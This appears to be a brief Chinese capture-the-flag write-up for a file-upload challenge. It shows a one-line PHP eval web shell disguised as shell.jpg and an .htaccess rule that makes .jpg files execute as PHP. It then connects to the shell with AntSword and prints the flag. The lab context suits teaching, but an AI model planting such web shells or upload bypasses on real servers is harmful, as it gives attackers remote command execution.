1.题目描述

2.打开题目链接

3.上传shell.jpg文件，显示连接成功，但是用蚁剑连接却连接不上。shell文件内容为

<script language='php'>eval($_REQUEST[cmd]);</script>

4.用bp抓包，修改属性

5.需要上传一个.htaccess的文件来把jpg后缀的文件全都当作php文件来执行，.htsccess文件内容为

AddType application/x-httpd-php .jpg

6.刚刚我们上传了shell.jpg

就接下来上传.htaccess文件，修改这里

7.接下来我们放包回去，点击forward

8.接下来我们访问shell.jpg文件

访问地址为

http://97d484a8-851f-4d4d-9507-aa835dd782f4.node5.buuoj.cn:81/upload/8d47dd0461a3a88317b0af687ebf8526/shell%20.jpg

9.接下来我们使用蚁剑连接

flag{3687354e-fb5d-415c-b5ec-0c92e80df3e4}